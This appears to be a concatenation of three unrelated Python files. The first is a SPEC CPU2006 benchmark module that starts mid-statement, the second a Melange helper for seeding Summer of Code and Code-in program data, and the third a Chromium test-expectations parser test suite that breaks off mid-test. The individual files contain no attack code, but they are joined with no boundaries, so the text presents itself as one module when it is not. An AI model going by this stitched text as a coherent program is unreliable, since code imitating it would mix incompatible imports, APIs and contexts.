'binaries (useful when running on memory constrained '
'instance types where 64-bit execution may be problematic '
' - i.e. < 1.5-2GB/core)')
BENCHMARK_INFO = {'name': 'speccpu2006',
'description': 'Run Spec CPU2006',
'scratch_disk': True,
'num_machines': 1}
SPECCPU2006_TAR = 'cpu2006v1.2.tgz'
SPECCPU2006_DIR = 'cpu2006'
def GetInfo():
return BENCHMARK_INFO
def CheckPrerequisites():
"""Verifies that the required resources are present.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
"""
data.ResourcePath(SPECCPU2006_TAR)
def Prepare(benchmark_spec):
"""Install SpecCPU2006 on the target vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
vms = benchmark_spec.vms
vm = vms[0]
logging.info('prepare SpecCPU2006 on %s', vm)
vm.Install('wget')
vm.Install('build_tools')
vm.Install('fortran')
  if FLAGS.runspec_enable_32bit:
vm.Install('multilib')
vm.Install('numactl')
try:
local_tar_file_path = data.ResourcePath(SPECCPU2006_TAR)
except data.ResourceNotFound as e:
logging.error('Please provide %s under perfkitbenchmarker/data directory '
'before running SpecCPU2006 benchmark.', SPECCPU2006_TAR)
raise errors.Benchmarks.PrepareException(str(e))
vm.tar_file_path = os.path.join(vm.GetScratchDir(), SPECCPU2006_TAR)
vm.spec_dir = os.path.join(vm.GetScratchDir(), SPECCPU2006_DIR)
vm.RemoteCommand('chmod 777 %s' % vm.GetScratchDir())
vm.PushFile(local_tar_file_path, vm.GetScratchDir())
vm.RemoteCommand('cd %s && tar xvfz %s' % (vm.GetScratchDir(),
SPECCPU2006_TAR))
def ExtractScore(stdout, vm):
"""Exact the Spec (int|fp) score from stdout.
Args:
stdout: stdout from running RemoteCommand.
vm: The vm instance where Spec CPU2006 was run.
Sample input for SPECint:
...
...
=============================================
400.perlbench 9770 417 23.4 *
401.bzip2 9650 565 17.1 *
403.gcc 8050 364 22.1 *
429.mcf 9120 364 25.1 *
445.gobmk 10490 499 21.0 *
456.hmmer 9330 491 19.0 *
458.sjeng 12100 588 20.6 *
462.libquantum 20720 468 44.2 *
464.h264ref 22130 700 31.6 *
471.omnetpp 6250 349 17.9 *
473.astar 7020 482 14.6 *
483.xalancbmk 6900 248 27.8 *
Est. SPECint(R)_base2006 22.7
Sample input for SPECfp:
...
...
=============================================
410.bwaves 13590 717 19.0 *
416.gamess 19580 923 21.2 *
433.milc 9180 480 19.1 *
434.zeusmp 9100 600 15.2 *
435.gromacs 7140 605 11.8 *
436.cactusADM 11950 1289 9.27 *
437.leslie3d 9400 859 10.9 *
444.namd 8020 504 15.9 *
447.dealII 11440 409 28.0 *
450.soplex 8340 272 30.6 *
453.povray 5320 231 23.0 *
454.calculix 8250 993 8.31 *
459.GemsFDTD 10610 775 13.7 *
465.tonto 9840 565 17.4 *
470.lbm 13740 365 37.7 *
481.wrf 11170 788 14.2 *
482.sphinx3 19490 668 29.2 *
Est. SPECfp(R)_base2006 17.5
Returns:
A list of sample.Sample objects.
"""
results = []
re_begin_section = re.compile('^={1,}')
re_end_section = re.compile(r'Est. (SPEC.*_base2006)\s*(\S*)')
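  # e.g. the line 'Est. SPECint(R)_base2006    22.7' yields the groups
  # ('SPECint(R)_base2006', '22.7').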
result_section = []
in_result_section = False
# Extract the summary section
for line in stdout.splitlines():
if in_result_section:
result_section.append(line)
# search for begin of result section
match = re.search(re_begin_section, line)
if match:
assert not in_result_section
in_result_section = True
continue
# search for end of result section
match = re.search(re_end_section, line)
if match:
assert in_result_section
spec_name = str(match.group(1))
spec_score = float(match.group(2))
in_result_section = False
# remove the final SPEC(int|fp) score, which has only 2 columns.
result_section.pop()
metadata = {'machine_type': vm.machine_type, 'num_cpus': vm.num_cpus}
results.append(sample.Sample(spec_name, spec_score, '', metadata))
for benchmark in result_section:
# ignore failed runs
if re.search('NR', benchmark):
continue
# name, ref_time, time, score, misc
name, _, _, score, _ = benchmark.split()
results.append(sample.Sample(str(name), float(score), '', metadata))
return results
def ParseOutput(vm):
"""Parses the output from Spec CPU2006.
Args:
vm: The vm instance where Spec CPU2006 was run.
Returns:
A list of samples to be published (in the same format as Run() returns).
"""
results = []
log_files = []
# FIXME(liquncheng): Only reference runs generate SPEC scores. The log
# id is hardcoded as 001, which might change with different runspec
# parameters. Spec CPU 2006 will generate different logs for build, test
# run, training run and ref run.
if FLAGS.benchmark_subset in ('int', 'all'):
log_files.append('CINT2006.001.ref.txt')
if FLAGS.benchmark_subset in ('fp', 'all'):
log_files.append('CFP2006.001.ref.txt')
for log in log_files:
stdout, _ = vm.RemoteCommand('cat %s/result/%s' % (vm.spec_dir, log),
should_log=True)
results.extend(ExtractScore(stdout, vm))
return results
def Run(benchmark_spec):
"""Run SpecCPU2006 on the target vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
A list of sample.Sample objects.
"""
vms = benchmark_spec.vms
vm = vms[0]
logging.info('SpecCPU2006 running on %s', vm)
num_cpus = vm.num_cpus
  iterations = (' --iterations=' + repr(FLAGS.runspec_iterations)
                if FLAGS.runspec_iterations != 3 else '')
  defines = (' --define ' + ' --define '.join(FLAGS.runspec_define.split(','))
             if FLAGS.runspec_define != '' else '')
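  # With the default flags on, say, an 8-vCPU machine (num_cpus is taken from
  # the vm, so the value here is illustrative), the assembled command is:
  #   runspec --config=linux64-x64-gcc47.cfg --tune=base --size=ref \
  #       --noreportable --rate 8 int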
vm.RemoteCommand('cd %s; . ./shrc; ./bin/relocate; . ./shrc; rm -rf result; '
'runspec --config=%s --tune=base '
'--size=ref --noreportable --rate %s%s%s %s'
% (vm.spec_dir, FLAGS.runspec_config, num_cpus, iterations,
defines, FLAGS.benchmark_subset))
logging.info('SpecCPU2006 Results:')
return ParseOutput(vm)
def Cleanup(benchmark_spec):
"""Cleanup SpecCPU2006 on the target vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
vms = benchmark_spec.vms
vm = vms[0]
vm.RemoteCommand('rm -rf %s' % vm.spec_dir)
vm.RemoteCommand('rm -f %s' % vm.tar_file_path)
#!/usr/bin/env python2.5
#
# Copyright 2011 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils for manipulating program data.
"""
from datetime import date
from soc.models.document import Document
from soc.models.org_app_survey import OrgAppSurvey
from soc.models.site import Site
from soc.models.sponsor import Sponsor
from soc.models.user import User
from soc.modules.gci.models.organization import GCIOrganization
from soc.modules.gci.models.program import GCIProgram
from soc.modules.gci.models.timeline import GCITimeline
from soc.modules.gsoc.models.organization import GSoCOrganization
from soc.modules.gsoc.models.program import GSoCProgram
from soc.modules.gsoc.models.timeline import GSoCTimeline
from soc.modules.seeder.logic.providers.string import DocumentKeyNameProvider
from soc.modules.seeder.logic.seeder import logic as seeder_logic
class ProgramHelper(object):
"""Helper class to aid in manipulating program data.
"""
def __init__(self):
"""Initializes the ProgramHelper.
    The founder, sponsor, program, org_app, org and site attributes start out
    as None and are filled in lazily by the create* methods below.
    """
self.founder = None
self.sponsor = None
self.program = None
self.org_app = None
self.org = None
self.site = None
self.createOrg = self.createOrUpdateOrg
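  # A typical flow (a sketch; the GSoC/GCI subclasses below supply the
  # program-specific properties):
  #   helper = GSoCProgramHelper()
  #   program = helper.createProgram()
  #   org = helper.createOrg()  # alias for createOrUpdateOrg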
def seed(self, model, properties,
auto_seed_optional_properties=True):
return seeder_logic.seed(model, properties, recurse=False,
auto_seed_optional_properties=auto_seed_optional_properties)
def seedn(self, model, properties, n,
auto_seed_optional_properties=True):
return seeder_logic.seedn(model, n, properties, recurse=False,
auto_seed_optional_properties=auto_seed_optional_properties)
def createFounder(self, override={}):
"""Creates a founder for the defined properties.
"""
if self.founder:
return self.founder
properties = {}
properties.update(override)
self.founder = self.seed(User, properties)
return self.founder
def createSponsor(self, override={}):
"""Creates a sponsor for the defined properties.
"""
if self.sponsor:
return self.sponsor
if self.founder is None:
self.createFounder()
properties = {'founder': self.founder, 'home': None}
properties.update(override)
self.sponsor = self.seed(Sponsor, properties)
return self.sponsor
def createProgram(self, override={}):
"""Creates a program for the defined properties.
"""
if self.sponsor is None:
self.createSponsor()
def createOrgApp(self, override={}):
"""Creates an organization application for the defined properties.
"""
if self.org_app:
return self.org_app
if self.program is None:
self.createProgram()
# TODO (Madhu): Remove scope and author fields once the data
# conversion is done.
properties = {
'key_name': 'gci_program/%s/orgapp' % self.program.key().name(),
'scope': self.program, 'program': self.program,
'modified_by': self.founder,
'created_by': self.founder,
'author': self.founder,
'schema': ('[["item"],{"item":{"field_type":"input_text",'
'"required":false, "label":"test"}}]'),
'survey_content': None,
}
properties.update(override)
self.org_app = self.seed(OrgAppSurvey, properties)
return self.org_app
def _updateEntity(self, entity, override):
"""Updates self.<entity> with override.
"""
properties = entity.properties()
for name, value in override.iteritems():
properties[name].__set__(entity, value)
entity.put()
return entity
def _updateOrg(self, override):
"""Updates self.org with override.
"""
return self._updateEntity(self.org, override)
def createOrUpdateOrg(self, override={}):
"""Creates or updates an org (self.org) for the defined properties.
"""
if self.org:
if not override:
return self.org
else:
return self._updateOrg(override)
self.org = self.createNewOrg(override)
return self.org
def createNewOrg(self, override={}):
"""Creates a new organization for the defined properties.
This new organization will not be stored in self.org but returned.
"""
if self.program is None:
self.createProgram()
def createSite(self, override={}):
"""Creates a site for the defined properties.
"""
if self.program is None:
self.createProgram()
properties = {'key_name': 'site', 'link_id': 'site',
'active_program': self.program}
properties.update(override)
self.site = Site(**properties)
self.site.put()
return self.site
class GSoCProgramHelper(ProgramHelper):
"""Helper class to aid in manipulating GSoC program data.
"""
def __init__(self):
"""Initializes the GSoCProgramHelper.
"""
super(GSoCProgramHelper, self).__init__()
def createProgram(self, override={}):
"""Creates a program for the defined properties.
"""
if self.program:
return self.program
super(GSoCProgramHelper, self).createProgram()
properties = {'scope': self.sponsor}
self.program_timeline = self.seed(GSoCTimeline, properties)
properties = {'timeline': self.program_timeline,
'status': 'visible', 'apps_tasks_limit': 20,
'scope': self.sponsor,
'student_agreement': None, 'events_page': None,
'help_page': None, 'connect_with_us_page': None,
'mentor_agreement': None, 'org_admin_agreement': None,
'terms_and_conditions': None,
'home': None, 'about_page': None}
properties.update(override)
self.program = self.seed(GSoCProgram, properties)
properties = {
'prefix': 'gsoc_program', 'scope': self.program,
'read_access': 'public', 'key_name': DocumentKeyNameProvider(),
'modified_by': self.founder, 'author': self.founder,
'home_for': None,
}
document = self.seed(Document, properties=properties)
self.program.about_page = document
self.program.events_page = document
self.program.help_page = document
self.program.connect_with_us_page = document
self.program.privacy_policy = document
self.program.put()
return self.program
def createNewOrg(self, override={}):
"""Creates a new organization for the defined properties.
This new organization will not be stored in self.org but returned.
"""
super(GSoCProgramHelper, self).createNewOrg(override)
properties = {'scope': self.program, 'status': 'active',
'scoring_disabled': False, 'max_score': 5,
'founder': self.founder, 'home': None,}
properties.update(override)
return self.seed(GSoCOrganization, properties)
class GCIProgramHelper(ProgramHelper):
"""Helper class to aid in manipulating GCI program data.
"""
def __init__(self):
"""Initializes the GCIProgramHelper.
"""
super(GCIProgramHelper, self).__init__()
def createProgram(self, override={}):
"""Creates a program for the defined properties.
"""
if self.program:
return self.program
super(GCIProgramHelper, self).createProgram()
properties = {'scope': self.sponsor}
self.program_timeline = self.seed(GCITimeline, properties)
properties = {
'timeline': self.program_timeline,
'status': 'visible',
'scope': self.sponsor,
'student_agreement': None, 'events_page': None,
'help_page': None, 'connect_with_us_page': None,
'mentor_agreement': None, 'org_admin_agreement': None,
'terms_and_conditions': None, 'home': None, 'about_page': None,
'nr_simultaneous_tasks': 5,
'student_min_age': 13, 'student_max_age': 17,
'student_min_age_as_of': date.today(),
'task_types': ['code', 'documentation', 'design'],
}
properties.update(override)
self.program = self.seed(GCIProgram, properties)
properties = {
'prefix': 'gci_program', 'scope': self.program,
'read_access': 'public', 'key_name': DocumentKeyNameProvider(),
'modified_by': self.founder, 'author': self.founder,
'home_for': None,
}
document = self.seed(Document, properties=properties)
self.program.about_page = document
self.program.events_page = document
self.program.help_page = document
self.program.connect_with_us_page = document
self.program.privacy_policy = document
self.program.put()
return self.program
def createNewOrg(self, override={}):
"""Creates a new organization for the defined properties.
This new organization will not be stored in self.org but returned.
"""
super(GCIProgramHelper, self).createNewOrg(override)
properties = {'scope': self.program, 'status': 'active',
'founder': self.founder,
'home': None,
'task_quota_limit': 100}
properties.update(override)
return self.seed(GCIOrganization, properties)
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from typ import expectations_parser
from typ import json_results
ConflictResolutionTypes = expectations_parser.ConflictResolutionTypes
ResultType = json_results.ResultType
Expectation = expectations_parser.Expectation
TestExpectations = expectations_parser.TestExpectations
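# The expectation-file syntax exercised below: '# tags:' and '# results:'
# header comments declare the legal tags and result values; each expectation
# line then has the form
#   <optional bug url> [ tags ] <test name> [ results ]  # optional comment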
class TaggedTestListParserTest(unittest.TestCase):
def testInitWithGoodData(self):
good_data = """
# This is a test expectation file.
#
# tags: [ Release Debug ]
# tags: [ Linux
# Mac Mac10.1 Mac10.2
# Win ]
# results: [ Skip ]
crbug.com/12345 [ Mac ] b1/s1 [ Skip ] # foo
crbug.com/23456 [ Mac Debug ] b1/s2 [ Skip ]
"""
parser = expectations_parser.TaggedTestListParser(good_data)
tag_sets = [{'debug', 'release'},
{'linux', 'mac', 'mac10.1', 'mac10.2', 'win'}]
self.assertEqual(tag_sets, parser.tag_sets)
expected_outcome = [
expectations_parser.Expectation('crbug.com/12345', 'b1/s1',
['mac'], ['SKIP'], 10, trailing_comments=' # foo'),
expectations_parser.Expectation('crbug.com/23456', 'b1/s2',
['mac', 'debug'], ['SKIP'], 11)
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testInitWithBadData(self):
bad_data = """
# This is a test expectation file.
#
# tags: [ tag1 tag2 tag3 ]
# tags: [ tag4 ]
# results: [ Skip ]
crbug.com/12345 [ Mac b1/s1 [ Skip ]
"""
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(bad_data)
def testInitWithNonCanonicalResultTagDefinition(self):
bad_data = """
# This is a test expectation file.
#
# tags: [ tag1 tag2 tag3 ]
# tags: [ tag4 ]
# results: [ skip ]
"""
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(bad_data)
def testInitWithNonCanonicalResultTagUsage(self):
bad_data = """
# This is a test expectation file.
#
# tags: [ tag1 tag2 tag3 ]
# tags: [ tag4 ]
# results: [ Skip ]
crbug.com/12345 [ tag1 ] some/test/name [ SKIP ]
"""
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(bad_data)
def testTagAfterExpectationsStart(self):
bad_data = """
# This is a test expectation file.
#
# tags: [ tag1 tag2 tag3 ]
crbug.com/12345 [ tag1 ] b1/s1 [ Skip ]
# tags: [ tag4 ]
"""
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(bad_data)
def testParseExpectationLineEverythingThere(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/23456 [ Mac ] b1/s2 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation('crbug.com/23456', 'b1/s2',
['mac'], ['SKIP'], 3)
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineAngleProjectNoTags(self):
raw_data = '# tags: [ ]\n# results: [ Skip ]\ncrbug.com/angleproject/23456 b1/s2 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation('crbug.com/angleproject/23456',
'b1/s2', [], ['SKIP'], 3)
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineBadProject(self):
raw_data = '# tags: [ ]\n# results: [ Skip ]\ncrbug.com/bad/project/23456 b1/s2 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineBadTag(self):
raw_data = '# tags: None\n# results: [ Skip ]\ncrbug.com/23456 [ Mac ] b1/s2 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineNoTags(self):
raw_data = '# tags: [ All ]\n# results: [ Skip ]\ncrbug.com/12345 b1/s1 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation('crbug.com/12345', 'b1/s1', [],
['SKIP'], 3),
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineNoBug(self):
raw_data = '# tags: [ All ]\n# results: [ Skip ]\n[ All ] b1/s1 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation(None, 'b1/s1', ['all'], ['SKIP'], 3),
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineNoBugNoTags(self):
raw_data = '# tags: [ All ]\n# results: [ Skip ]\nb1/s1 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation(None, 'b1/s1', [], ['SKIP'], 3),
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineMultipleTags(self):
raw_data = ('# tags: [ All None batman ]\n'
'# results: [ Skip Pass Failure ]\n'
'crbug.com/123 [ all ] b1/s1 [ Skip ]\n'
'crbug.com/124 [ None ] b1/s2 [ Pass ]\n'
'crbug.com/125 [ Batman ] b1/s3 [ Failure ]')
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation(
'crbug.com/123', 'b1/s1', ['all'], ['SKIP'], 3),
expectations_parser.Expectation(
'crbug.com/124', 'b1/s2', ['none'], ['PASS'], 4),
expectations_parser.Expectation(
'crbug.com/125', 'b1/s3', ['batman'], ['FAIL'], 5)
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineBadTagBracket(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/23456 ] Mac ] b1/s2 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineBadResultBracket(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/23456 ] Mac ] b1/s2 ] Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineBadTagBracketSpacing(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/2345 [Mac] b1/s1 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineBadResultBracketSpacing(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/2345 [ Mac ] b1/s1 [Skip]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineNoClosingTagBracket(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/2345 [ Mac b1/s1 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineNoClosingResultBracket(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/2345 [ Mac ] b1/s1 [ Skip'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineUrlInTestName(self):
raw_data = (
'# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/123 [ Mac ] b.1/http://google.com [ Skip ]'
)
expected_outcomes = [
expectations_parser.Expectation(
'crbug.com/123', 'b.1/http://google.com', ['mac'], ['SKIP'], 3)
]
parser = expectations_parser.TaggedTestListParser(raw_data)
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcomes[i])
def testParseExpectationSpaceEscapeInTestName(self):
raw_data = (
'# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/123 [ Mac ] http://google.com/Foo%20Bar [ Skip ]'
)
expected_outcomes = [
expectations_parser.Expectation(
'crbug.com/123', 'http://google.com/Foo Bar', ['mac'], ['SKIP'], 3)
]
parser = expectations_parser.TaggedTestListParser(raw_data)
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcomes[i])
def testParseExpectationPercentEscapeInTestName(self):
raw_data = (
'# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/123 [ Mac ] http://google.com/Foo%2520Bar [ Skip ]'
)
expected_outcomes = [
expectations_parser.Expectation(
'crbug.com/123', 'http://google.com/Foo%20Bar', ['mac'], ['SKIP'], 3)
]
parser = expectations_parser.TaggedTestListParser(raw_data)
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcomes[i])
def testParseExpectationLineEndingComment(self):
raw_data = ('# tags: [ Mac ]\n# results: [ Skip ]\n'
'crbug.com/23456 [ Mac ] b1/s2 [ Skip ] # abc 123')
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation('crbug.com/23456', 'b1/s2',
['mac'], ['SKIP'], 3,
trailing_comments=' # abc 123')
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testSingleLineTagAfterMultiLineTagWorks(self):
expectations_file = """
# This is a test expectation file.
#
# tags: [ tag1 tag2
# tag3 tag5
# tag6
# ]
# tags: [ tag4 ]
# results: [ Skip ]
crbug.com/12345 [ tag3 tag4 ] b1/s1 [ Skip ]
"""
expectations_parser.TaggedTestListParser(expectations_file)
def testParseBadMultiline_1(self):
raw_data = ('# tags: [ Mac\n'
' Win\n'
'# ]\n# results: [ skip ]\n'
'crbug.com/23456 [ Mac ] b1/s2 [ SKip ]')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseTwoSetsOfTagsOnOneLineAreNotAllowed(self):
raw_data = ('# tags: [ Debug ] [ Release ]\n')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseTrailingTextAfterTagSetIsNotAllowed(self):
raw_data = ('# tags: [ Debug\n'
'# ] # Release\n')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseBadMultiline_2(self):
raw_data = ('# tags: [ Mac\n'
' Win ]\n'
'crbug.com/23456 [ Mac ] b1/s2 [ Skip ]')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseUnknownResult(self):
raw_data = ('# tags: [ Mac ]\n'
'crbug.com/23456 [ Mac ] b1/s2 [ UnknownResult ]')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testOneTagInMultipleTagsets(self):
raw_data = ('# tags: [ Mac Win Linux ]\n'
'# tags: [ Mac BMW ]')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertEqual(
'1: The tag mac was found in multiple tag sets',
str(context.exception))
def testTwoTagsinMultipleTagsets(self):
raw_data = ('\n# tags: [ Mac Linux ]\n# tags: [ Mac BMW Win ]\n'
'# tags: [ Win Android ]\n# tags: [ iOS ]')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertEqual(
'2: The tags mac and win were found in multiple tag sets',
str(context.exception))
def testTwoPlusTagsinMultipleTagsets(self):
raw_data = ('\n\n# tags: [ Mac Linux ]\n# tags: [ Mac BMW Win ]\n'
'# tags: [ Win Android ]\n# tags: [ IOS bmw ]')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertEqual(
'3: The tags bmw, mac and win'
' were found in multiple tag sets',
str(context.exception))
def testTwoTagsetPairsSharingTags(self):
raw_data = ('\n\n\n# tags: [ Mac Linux Win ]\n# tags: [ mac BMW Win ]\n'
'# tags: [ android ]\n# tags: [ IOS Android ]')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertEqual(
'4: The tags android, mac and win'
' were found in multiple tag sets',
str(context.exception))
def testDisjointTagsets(self):
raw_data = ('# tags: [ Mac Win Linux ]\n'
'# tags: [ Honda BMW ]')
expectations_parser.TaggedTestListParser(raw_data)
def testEachTagInGroupIsNotFromDisjointTagSets(self):
raw_data = (
'# tags: [ Mac Win Amd Intel]\n'
'# tags: [Linux Batman Robin Superman]\n'
'# results: [ Pass ]\n'
'crbug.com/23456 [ mac Win Amd robin Linux ] b1/s1 [ Pass ]\n')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertIn(
'4: The tag group contains tags '
'that are part of the same tag set\n',
str(context.exception))
self.assertIn(' - Tags linux and robin are part of the same tag set',
str(context.exception))
self.assertIn(' - Tags amd, mac and win are part of the same tag set',
str(context.exception))
self.assertNotIn(' - Tags webgl-version-1', str(context.exception))
def testEachTagInGroupIsFromDisjointTagSets(self):
raw_data = (
'# tags: [ Mac Win Linux ]\n'
'# tags: [ Batman Robin Superman ]\n'
'# tags: [ Android Iphone ]\n'
'# results: [ Failure Pass Skip ]\n'
'crbug.com/23456 [ android Mac Superman ] b1/s1 [ Failure ]\n'
'crbug.com/23457 [ Iphone win Robin ] b1/s2 [ Pass ]\n'
'crbug.com/23458 [ Android linux ] b1/s3 [ Pass ]\n'
'crbug.com/23459 [ Batman ] b1/s4 [ Skip ]\n')
expectations_parser.TaggedTestListParser(raw_data)
def testDuplicateTagsInGroupRaisesError(self):
raw_data = (
'# tags: [ Mac Win Linux ]\n'
'# tags: [ Batman Robin Superman ]\n'
'# results: [ Failure ]\n'
'crbug.com/23456 [ Batman Batman Batman ] b1/s1 [ Failure ]\n')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertIn('4: The tag group contains '
'tags that are part of the same tag set\n',
str(context.exception))
self.assertIn(' - Tags batman, batman and batman are'
' part of the same tag set', str(context.exception))
def testRetryOnFailureExpectation(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ linux ] b1/s1 [ RetryOnFailure ]\n')
parser = expectations_parser.TaggedTestListParser(raw_data)
exp = parser.expectations[0]
self.assertEqual(exp.should_retry_on_failure, True)
def testDefaultPass(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ Failure ]\n'
'crbug.com/23456 [ linux ] b1/s1 [ Failure ]\n')
expectations = expectations_parser.TestExpectations(tags=['linux'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Failure]))
self.assertFalse(exp.is_default_pass)
self.assertFalse(exp.is_slow_test)
exp = expectations.expectations_for('b1/s2')
self.assertEqual(exp.results, set([ResultType.Pass]))
self.assertTrue(exp.is_default_pass)
self.assertFalse(exp.is_slow_test)
def testSlowDefaultPassAndFailure(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ Failure Slow ]\n'
'crbug.com/23456 [ Linux ] b1/s1 [ Failure ]\n'
'crbug.com/23456 b1/s1 [ Slow ]\n')
expectations = expectations_parser.TestExpectations(tags=['linux'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Failure]))
self.assertFalse(exp.is_default_pass)
self.assertTrue(exp.is_slow_test)
expectations = expectations_parser.TestExpectations(tags=['win'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Pass]))
self.assertTrue(exp.is_default_pass)
self.assertTrue(exp.is_slow_test)
def testRetryOnFailureDefaultPassAndFailure(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ Failure RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/s1 [ Failure ]\n'
'crbug.com/23456 b1/s1 [ RetryOnFailure ]\n')
expectations = expectations_parser.TestExpectations(tags=['linux'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Failure]))
self.assertFalse(exp.is_default_pass)
self.assertTrue(exp.should_retry_on_failure)
expectations = expectations_parser.TestExpectations(tags=['win'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Pass]))
self.assertTrue(exp.is_default_pass)
self.assertTrue(exp.should_retry_on_failure)
def testGetExpectationsFromGlob(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ Failure ]\n'
'crbug.com/23456 [ linux ] b1/s1* [ Failure ]\n')
expectations = expectations_parser.TestExpectations(tags=['linux'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Failure]))
def testGetExpectationsFromGlobShorterThanLongestMatchingGlob(self):
raw_data = (
'# tags: [ Linux Mac ]\n'
'# results: [ Failure Pass ]\n'
